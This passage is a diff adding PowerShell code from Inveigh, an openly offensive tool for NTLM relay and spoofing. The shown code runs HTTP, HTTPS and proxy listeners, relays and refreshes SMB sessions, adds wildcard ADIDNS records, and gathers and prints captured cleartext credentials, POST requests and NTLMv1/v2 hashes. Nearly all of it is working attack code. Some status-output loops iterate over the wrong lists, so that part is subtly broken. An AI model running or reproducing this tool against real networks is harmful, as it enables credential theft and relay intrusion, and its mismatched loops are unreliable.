+
+ $packet_HTTPResponse.Add("HTTPResponse_Server",[System.Text.Encoding]::UTF8.GetBytes("Server: Microsoft-HTTPAPI/2.0") + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_ContentLength",[System.Text.Encoding]::UTF8.GetBytes("Content-Length: $($HTTP_message_bytes.Length)") + [Byte[]](0x0d,0x0a))
+
+ if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_content_type)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_cache_control)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_send)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
+ $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+ $HTTP_stream.Flush()
+ }
+
+ Start-Sleep -m 10
+ $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
+ $HTTP_client_handle_old = $HTTP_client.Client.Handle
+
+ if($HTTP_client_close)
+ {
+
+ if($proxy_listener)
+ {
+ $HTTP_client.Client.Close()
+ }
+ else
+ {
+ $HTTP_client.Close()
+ }
+
+ }
+
+ }
+ else
+ {
+
+ if($HTTP_client_handle_old -eq $HTTP_client.Client.Handle)
+ {
+ $HTTP_reset++
+ }
+ else
+ {
+ $HTTP_reset = 0
+ }
+
+ if($HTTP_data_available -or $HTTP_connection_header_close -or $HTTP_reset -gt 20)
+ {
+ $HTTP_client.Close()
+ $HTTP_client_close = $true
+ $HTTP_reset = 0
+ }
+ else
+ {
+ Start-Sleep -m 100
+ }
+
+ }
+
+ }
+
+ $HTTP_client.Close()
+ Start-sleep -s 1
+ $HTTP_listener.Server.blocking = $false
+ Start-Sleep -s 1
+ $HTTP_listener.Server.Close()
+ Start-Sleep -s 1
+ $HTTP_listener.Stop()
+}
+
+# Control Relay Loop ScriptBlock
+$control_relay_scriptblock =
+{
+ param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime)
+
+ function Invoke-OutputQueueLoop
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
+ function Stop-InveighRunspace
+ {
+ param ([String]$Message)
+
+ if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
+ {
+
+ try
+ {
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ foreach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]") > $null
+ }
+
+ }
+
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null
+ }
+
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.ADIDNS_table.Count -gt 0)
+ {
+ $ADIDNS_table_keys_temp = $inveigh.ADIDNS_table.Keys
+
+ foreach($ADIDNS_host in $ADIDNS_table_keys_temp)
+ {
+
+ if($inveigh.ADIDNS_table.$ADIDNS_host -eq 1)
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node $ADIDNS_host -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ $inveigh.ADIDNS_table.$DNS_host = $null
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] ADIDNS host (A) record for $ADIDNS_host remove failed") > $null
+ }
+
+ }
+
+ }
+
+ }
+
+ if($inveigh.relay_running)
+ {
+ Start-Sleep -m 100
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $Message") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting") > $null
+ }
+
+ if(!$inveigh.running)
+ {
+ Invoke-OutputQueueLoop
+ Start-Sleep -m 100
+ }
+
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
+ {
+ Start-Sleep -m 100
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $Message") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting") > $null
+ }
+
+ Invoke-OutputQueueLoop
+ Start-Sleep -m 100
+ $inveigh.running = $false
+ }
+
+ $inveigh.HTTPS = $false
+ }
+
+ if($RunTime)
+ {
+ $control_timeout = New-TimeSpan -Minutes $RunTime
+ $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ while($inveigh.relay_running -and !$inveigh.running)
+ {
+
+ if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
+ {
+ Start-Sleep -S 5
+ Stop-InveighRunspace "disabled relay"
+ }
+
+ if($RunTime)
+ {
+
+ if($control_stopwatch.Elapsed -ge $control_timeout)
+ {
+ Stop-InveighRunspace "run time"
+ }
+
+ }
+
+ if($inveigh.file_output -and -not $inveigh.control)
+ {
+
+ while($inveigh.log_file_queue.Count -gt 0)
+ {
+ $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+ $inveigh.log_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.NTLMv1_file_queue.Count -gt 0)
+ {
+ $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+ $inveigh.NTLMv1_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.NTLMv2_file_queue.Count -gt 0)
+ {
+ $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+ $inveigh.NTLMv2_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.cleartext_file_queue.Count -gt 0)
+ {
+ $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+ $inveigh.cleartext_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.form_input_file_queue.Count -gt 0)
+ {
+ $inveigh.form_input_file_queue[0]|Out-File $inveigh.form_input_out_file -Append
+ $inveigh.form_input_file_queue.RemoveAt(0)
+ }
+
+ }
+
+ if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
+ {
+
+ while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
+ {
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ if(!$inveigh.running)
+ {
+ Invoke-OutputQueueLoop
+ }
+
+ Start-Sleep -m 5
+
+ if($inveigh.stop)
+ {
+ $inveigh.console_queue.Clear()
+ Stop-InveighRunspace
+ }
+
+ }
+
+ }
+
+# Session Refresh Loop ScriptBlock
+$session_refresh_scriptblock =
+{
+ param ($SessionRefresh)
+
+ $process_ID_bytes = Get-ProcessIDArray
+
+ while($inveigh.relay_running)
+ {
+
+ if($inveigh.session_socket_table.Count -gt 0)
+ {
+ $session = 0
+
+ while($session -le $inveigh.session_socket_table.Count)
+ {
+ $session_timespan = New-TimeSpan $inveigh.session[$session]."Last Activity" $(Get-Date)
+
+ if($inveigh.session_socket_table[$session].Connected -and $inveigh.session_lock_table[$session] -eq 'open' -and $session_timespan.Minutes -ge $SessionRefresh)
+ {
+ $inveigh.session_lock_table[$session] = 'locked'
+ $client = $inveigh.session_socket_table[$session]
+ $client_stream = $client.GetStream()
+ $session_ID = $inveigh.session_table[$session]
+ $message_ID = $inveigh.session_message_ID_table[$session]
+ $tree_ID = 0x00,0x00,0x00,0x00
+ $client_receive = New-Object System.Byte[] 1024
+ $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$"
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ $message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $false $message_ID $process_ID_bytes $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay session $session has closed") > $null
+ $inveigh.session[$session] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ if($inveigh.session_socket_table[$session].Connected)
+ {
+ $tree_ID = $client_receive[40..43]
+ Start-Sleep -s 1
+ $message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $false $message_ID $process_ID_bytes $tree_ID $session_ID
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay session $session has closed") > $null
+ $inveigh.session[$session] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ }
+
+ $inveigh.session_lock_table[$Session] = 'open'
+ $inveigh.session[$Session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ $inveigh.session_message_ID_table[$Session] = $message_ID
+ }
+
+ $session++
+ Start-Sleep -s 1
+ }
+
+ }
+
+ Start-Sleep -s 1
+ }
+
+}
+
+#endregion
+#region begin startup functions
+
+ # HTTP Listener Startup Function
+function HTTPListener
+{
+ $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $false
+ $proxy_listener = $false
+ $HTTP_runspace.Open()
+ $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTP_powershell = [PowerShell]::Create()
+ $HTTP_powershell.Runspace = $HTTP_runspace
+ $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($packet_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedLoginThreshold).AddArgument(
+ $HTTPIP).AddArgument($HTTPPort).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
+ $SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($TargetMode).AddArgument($TargetRefresh).AddArgument($Username).AddArgument(
+ $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
+ $HTTP_powershell.BeginInvoke() > $null
+}
+
+# HTTPS Listener Startup Function
+function HTTPSListener
+{
+ $HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $true
+ $proxy_listener = $false
+ $HTTPS_runspace.Open()
+ $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTPS_powershell = [PowerShell]::Create()
+ $HTTPS_powershell.Runspace = $HTTPS_runspace
+ $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($packet_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedLoginThreshold).AddArgument(
+ $HTTPIP).AddArgument($HTTPSPort).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
+ $SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $HTTPS_powershell.BeginInvoke() > $null
+}
+
+# Proxy Listener Startup Function
+function ProxyListener
+{
+ $proxy_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $false
+ $proxy_listener = $true
+ $proxy_runspace.Open()
+ $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $proxy_powershell = [PowerShell]::Create()
+ $proxy_powershell.Runspace = $proxy_runspace
+ $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($packet_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedLoginThreshold).AddArgument(
+ $ProxyIP).AddArgument($ProxyPort).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
+ $SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $proxy_powershell.BeginInvoke() > $null
+}
+
+# Control Relay Startup Function
+function ControlRelayLoop
+{
+ $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
+ $control_relay_runspace.Open()
+ $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $control_relay_powershell = [PowerShell]::Create()
+ $control_relay_powershell.Runspace = $control_relay_runspace
+ $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($ADIDNS_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($packet_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $RelayAutoExit).AddArgument($RunTime) > $null
+ $control_relay_powershell.BeginInvoke() > $null
+}
+
+# Session Refresh Startup Function
+function SessionRefreshLoop
+{
+ $session_refresh_runspace = [RunspaceFactory]::CreateRunspace()
+ $session_refresh_runspace.Open()
+ $session_refresh_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $session_refresh_powershell = [PowerShell]::Create()
+ $session_refresh_powershell.Runspace = $session_refresh_runspace
+ $session_refresh_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($packet_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($session_refresh_scriptblock).AddArgument($SessionRefresh) > $null
+ $session_refresh_powershell.BeginInvoke() > $null
+}
+
+#endregion
+#region begin startup enabled services
+
+# HTTP Server Start
+if($HTTP -eq 'Y')
+{
+ HTTPListener
+ Start-Sleep -m 50
+}
+
+# HTTPS Server Start
+if($HTTPS -eq 'Y')
+{
+ HTTPSListener
+ Start-Sleep -m 50
+}
+
+# Proxy Server Start
+if($Proxy -eq 'Y')
+{
+ ProxyListener
+ Start-Sleep -m 50
+}
+
+# Control Relay Loop Start
+if(!$inveigh.running)
+{
+ ControlRelayLoop
+}
+
+# Session Refresh Loop Start
+if($SessionRefresh -gt 0)
+{
+ SessionRefreshLoop
+}
+
+# Console Output Loop
+try
+{
+
+ if($inveigh.console_output)
+ {
+
+ if($ConsoleStatus)
+ {
+ $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ :console_loop while(($inveigh.relay_running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
+
+ if($ConsoleOutput -eq 'Y')
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+ {
+
+ if($inveigh.cleartext_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique cleartext captures:" + $inveigh.newline)
+ $inveigh.cleartext_list.Sort()
+ $POST_request_list_temp = $inveigh.POST_request_list
+
+ foreach($unique_POST_request in $POST_request_list_temp)
+ {
+ if($unique_cleartext -ne $unique_cleartext_last)
+ {
+ Write-Output($unique_cleartext + $inveigh.newline)
+ }
+
+ $unique_cleartext_last = $unique_cleartext
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No cleartext credentials have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.POST_request_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique POST request captures:" + $inveigh.newline)
+ $inveigh.POST_request_list.Sort()
+ $NTLMv1_list_temp = $inveigh.NTLMv1_list
+
+ foreach($unique_NTLMv1 in $NTLMv1_list_temp)
+ {
+ if($unique_POST_request -ne $unique_POST_request_last)
+ {
+ Write-Output($unique_POST_request + $inveigh.newline)
+ }
+
+ $unique_POST_request_last = $unique_POST_request
+ }
+
+ Start-Sleep -m 5
+ }
+
+ if($inveigh.NTLMv1_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv1_list.Sort()
+ $NTLMv1_username_list_temp = $inveigh.NTLMv1_username_list
+
+ foreach($NTLMv1_username in $NTLMv1_username_list_temp)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output($unique_NTLMv1 + $inveigh.newline)
+ }
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ $unique_NTLMv1_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+ $NTLMv1_username_list_temp = $inveigh.NTLMv1_username_list
+
+ foreach($NTLMv1_username in $NTLMv1_username_list_temp)
+ {
+ Write-Output($NTLMv1_username + $inveigh.newline)
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv2_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv2_list.Sort()
+ $NTLMv2_list_temp = $inveigh.NTLMv2_list
+
+ foreach($unique_NTLMv2 in $NTLMv2_list_temp)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output($unique_NTLMv2 + $inveigh.newline)
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ $unique_NTLMv2_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+ $NTLMv2_username_list_temp = $inveigh.NTLMv2_username_list
+
+ foreach($NTLMv2_username in $NTLMv2_username_list_temp)
+ {
+ Write-Output($NTLMv2_username + $inveigh.newline)
+ }
+
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+ }
+
+ if($inveigh.console_input)
+ {
+
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+
+}
+finally
+{
+
+ if($Tool -eq 2)
+ {
+ $inveigh.relay_running = $false
+ }
+
+}
+
+}
+
+#endregion
+#region begin support functions
+
+function Stop-Inveigh
+{
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+ if($inveigh)
+ {
+ $inveigh.stop = $true
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+ $inveigh.console_queue.Clear()
+ Watch-Inveigh -NoConsoleMessage
+ Start-Sleep -S 2
+ }
+ else
+ {
+ Write-Output "[-] There are no running Inveigh functions"
+ }
+
+ }
+
+}
+
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER ADIDNS
+Get added DNS host records.
+
+.PARAMETER ADIDNSFailed
+Get failed DNS host record adds.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER POSTRequest
+Get captured POST requests.
+
+.PARAMETER POSTRequestUnique
+Get unique captured POST request.
+
+.PARAMETER Session
+Get relay session list.
+#>
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$ADIDNS,
+ [parameter(Mandatory=$false)][Switch]$ADIDNSFailed,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
+ [parameter(Mandatory=$false)][Switch]$Enumerate,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+ )
+
+ if($Console -or $PSBoundParameters.Count -eq 0)
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ if($ADIDNS)
+ {
+ $ADIDNS_table_keys_temp = $inveigh.ADIDNS_table.Keys
+
+ foreach($ADIDNS_host in $ADIDNS_table_keys_temp)
+ {
+
+ if($inveigh.ADIDNS_table.$ADIDNS_host -eq 1)
+ {
+ Write-Output $ADIDNS_host
+ }
+
+ }
+
+ }
+
+ if($ADIDNSFailed)
+ {
+ $ADIDNS_table_keys_temp = $inveigh.ADIDNS_table.Keys
+
+ foreach($ADIDNS_host in $ADIDNS_table_keys_temp)
+ {
+
+ if($inveigh.ADIDNS_table.$ADIDNS_host -eq 0)
+ {
+ Write-Output $ADIDNS_host
+ }
+
+ }
+
+ }
+
+ if($Log)
+ {
+ Write-Output $inveigh.log
+ }
+
+ if($NTLMv1)
+ {
+ Write-Output $inveigh.NTLMv1_list
+ }
+
+ if($NTLMv1Unique)
+ {
+ $inveigh.NTLMv1_list.Sort()
+ $NTLMv1_list_temp = $inveigh.NTLMv1_list
+
+ foreach($unique_NTLMv1 in $NTLMv1_list_temp)
+ {
